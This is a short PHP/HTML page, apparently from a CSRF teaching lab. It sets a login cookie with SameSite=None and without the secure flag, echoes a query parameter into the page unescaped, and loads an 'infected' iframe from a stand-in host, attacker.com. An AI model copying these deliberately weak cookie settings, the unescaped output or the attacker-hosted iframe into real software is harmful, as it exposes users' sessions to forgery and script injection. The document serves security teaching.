<?php
// Simulating a login cookie, assuming user has logged in to set this cookie

if (isset($_GET["name"])) {
    $name = $_GET["name"];
    setcookie("login", $name, [
        'expires' => time() + 86400,
        'path' => '/',
        'domain' => 'host.com',
        'secure' => false,
        'httponly' => true,
        'samesite' => 'None',
    ]);
    echo "Cookie set ! : login=$name";
} else {
    echo "No Cookie set !";
}
?>
<html>
<head>
    <title>CSRF</title>
</head>
<body>
<script>
    const protocol = window.location.protocol;
    const port = window.location.port;

    function call() {
        const url = `${protocol}//host.com:${port}/tp5/ressources/simple.php`;
        const params = {
            method: 'GET',
            credentials: 'include',
        };

        fetch(url, params)
            .then(response => {
                return response.text();
            })
            .then(data => {
                document.getElementById("answer-div").innerText = data;
            })
            .catch(err => {
                console.log(err);
            });
    }
</script>
<font size="5">
    This page was generated by the Server
    <button onclick="call()">Call the Server</button>
</font>
<div id=answer-div>Waiting for an answer...</div>
<script>
    const iframeInfected = document.createElement("iframe");
    iframeInfected.src = `${protocol}//attacker.com:${port}/tp5/mycode/iframe_infected.php`;
    iframeInfected.title = "infected iframe";
    document.body.appendChild(iframeInfected);
</script>
</body>
</html>